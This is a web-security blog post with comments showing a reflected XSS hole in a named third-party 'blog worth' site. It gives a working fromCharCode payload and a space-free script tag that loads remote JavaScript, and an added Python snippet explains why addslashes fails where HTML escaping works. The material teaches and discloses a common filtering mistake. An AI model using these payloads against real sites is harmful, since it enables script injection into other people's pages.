web application security lab

How Much Is Your Blog Worth

I ran into a link from Shoemoney a while back and I always thought it was amusing. If you rank high enough in technorati.com you’ll find that www.business-opportunities.biz claims you are worth a lot of money. As a matter of point, this blog (http://ha.ckers.org/) is worth $82,000. Not bad! Any takers?

But then I checked http://x.ca/<script>alert(String.fromCharCode(88,83,83))</script> and apparently that’s not worth anything other than a page rank 7 XSS injection. That’s not super interesting, except for why I needed to use this particular injection. The author put some amount of filtering in his scripts looking to block single and double quotes by adding in a backslash for each. There are many ways around this (the one above is probably the simplest way since it doesn’t appear to decode %20 to space).

A while back I got an email from star_dust who came up with another method to inject JavaScript without any spaces. Granted, it still uses quotes so it wouldn’t have worked for this particular injection but it made me think. Until now I hadn’t thought it was worth posting, but now I think it is:

<script/XSS=''SRC='http://ha.ckers.org/xss.js'></script>

That works fine because of the slash, which is a non-alpha-non-numeric. Firefox pretty much allows anything there, but IE only allows the slash. There may have been a way to modify this to remove quotes, but I wasn’t that desperate to show the demonstration. Maybe I can up it so it says my blog is worth a million? Maybe there is some sucker who thinks $80k is a bargain. Who knows!

P.S. Please don’t mess with this poor guy’s blog. This was for demonstration purposes only.
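To make the filtering point concrete, here is an added example (not code from the post or from the site being discussed) that contrasts the quote-backslashing filter described above with context-correct HTML escaping. The `addslashes` reimplementation is an assumption about what the filter did (it mirrors PHP’s function of that name, which a comment below also suggests); the `render_with` helper and its page template are constructed stand-ins for the blog-worth page echoing a submitted URL into its HTML.

```python
import html


def addslashes(s: str) -> str:
    """Mimic PHP's addslashes(): backslash-escape ', ", backslash and NUL.

    Assumption: this is the kind of filter the post describes. It was designed
    for quoting inside SQL string literals and leaves < and > untouched, so it
    does nothing against markup injected into an HTML page.
    """
    out = []
    for ch in s:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def html_escape(s: str) -> str:
    """Context-correct escaping for text placed into an HTML body or attribute.

    html.escape with quote=True turns & < > " and ' into entities, so the
    browser renders the input as text instead of parsing it as tags.
    """
    return html.escape(s, quote=True)


# Constructed samples: the two payloads quoted in the post.
NO_QUOTES = "<script>alert(String.fromCharCode(88,83,83))</script>"
NO_SPACES = "<script/XSS=''SRC='http://ha.ckers.org/xss.js'></script>"


def render_with(filter_fn, untrusted: str) -> str:
    """Simulate a page that echoes the submitted URL into its HTML after
    running it through the chosen filter (constructed template)."""
    return "<p>Value of " + filter_fn(untrusted) + ": $0</p>"


def still_contains_tag(rendered: str) -> bool:
    """Cheap check: did a literal '<script' survive into the rendered page?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    for name, payload in (("no quotes", NO_QUOTES), ("no spaces", NO_SPACES)):
        for label, fn in (("addslashes", addslashes), ("html_escape", html_escape)):
            page = render_with(fn, payload)
            print(f"{name:9} via {label:11}: tag survives = {still_contains_tag(page)}")
```

The first payload contains no quotes at all, so `addslashes` leaves it byte-for-byte intact; the second keeps its `<script ...>` tags even though its quotes gain backslashes. Only `html_escape` removes the angle brackets, because it is escaping for the output context (HTML) rather than for a SQL string.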

4 Responses to “How Much Is Your Blog Worth”

  1. Legionnaire Says:

    I’m sure the guy will get a lot of visits this week :P

  2. RSnake Says:

    Now now, be nice! I actually like his tool a lot. I’m not sure how it decides what the sites are worth, but clearly it’s based on popularity. Now I just need to get a few spam domains to link to me and poof! My million dollar blog is set!

  3. Kyo Says:

    Well, I am pretty sure he used the PHP function addslashes.

    This function blocks SQL injections, but not XSS, which is a common mistake. I’ve seen a lot of sites that did the same thing.

  4. RSnake Says:

    That’s probably true, Kyo. Without seeing the code, I wasn’t going to make assumptions but yes, that’s probably true. And you’re absolutely correct, that is a common mistake.